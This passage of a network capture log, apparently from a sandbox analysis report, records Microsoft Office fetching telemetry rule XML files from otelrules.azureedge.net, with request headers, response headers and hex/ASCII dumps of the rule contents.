                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:20 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 450
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                                                            x-ms-request-id: a31f2de1-f01e-0096-7209-2d10ef000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133920Z-16547b76f7fdf69shC1DFWcpd000000006fg00000000h86z
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:20 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            14192.168.2.54972413.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:20 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:20 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:20 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 2160
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                                                            x-ms-request-id: dcc6854f-e01e-0051-7b03-2d84b2000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133920Z-16547b76f7fxdzxghC1DFWmf7n00000006w0000000004stf
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:20 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            15192.168.2.54972813.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:21 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:21 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 471
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                                                            x-ms-request-id: 1a2e7d6b-a01e-000d-7bfc-2cd1ea000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133921Z-16547b76f7f9rdn9hC1DFWfk7s00000006kg00000000han6
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:21 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            16192.168.2.54972913.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:21 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:21 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:21 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 632
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                                                            x-ms-request-id: 23cb21e1-e01e-0052-4e08-2cd9df000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133921Z-16547b76f7f67wxlhC1DFWah9w00000006mg00000000e7vx
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:21 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            17192.168.2.54973013.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:21 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:21 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 467
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                                                            x-ms-request-id: a2886317-b01e-00ab-6c01-2ddafd000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133921Z-16547b76f7frbg6bhC1DFWr54000000006pg000000005d4q
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:21 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            18192.168.2.54972713.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:21 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:21 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 415
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                                                            x-ms-request-id: d3a7539b-d01e-0049-4855-2ee7dc000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133921Z-17df447cdb5qkskwhC1DFWeeg400000002xg0000000094q2
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:21 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            19192.168.2.54972613.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:22 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:22 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 474
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582B9964B277"
                                                                                                                                                                                                                            x-ms-request-id: 7b71120f-601e-0050-0560-2e2c9c000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133922Z-15869dbbcc6lxrkghC1DFWp3wc000000075g000000003rkx
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:23 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            20192.168.2.54973213.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:22 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:22 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 486
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BB344914B"
                                                                                                                                                                                                                            x-ms-request-id: 1b94f42b-e01e-000c-2959-2f8e36000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133922Z-15869dbbcc65c582hC1DFW2xkc000000071g000000000ukf
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:22 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            21192.168.2.54973413.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:22 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:22 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 486
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582B9018290B"
                                                                                                                                                                                                                            x-ms-request-id: e750139a-701e-000d-1fcb-2f6de3000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133922Z-17df447cdb57g7m7hC1DFW791s00000002ug00000000afsf
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:22 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            22192.168.2.54973113.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:22 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:22 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 407
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                                                            x-ms-request-id: c0039004-a01e-0070-7e5f-2e573b000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133922Z-15869dbbcc6ss7fxhC1DFW86fs00000003eg00000000a4te
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
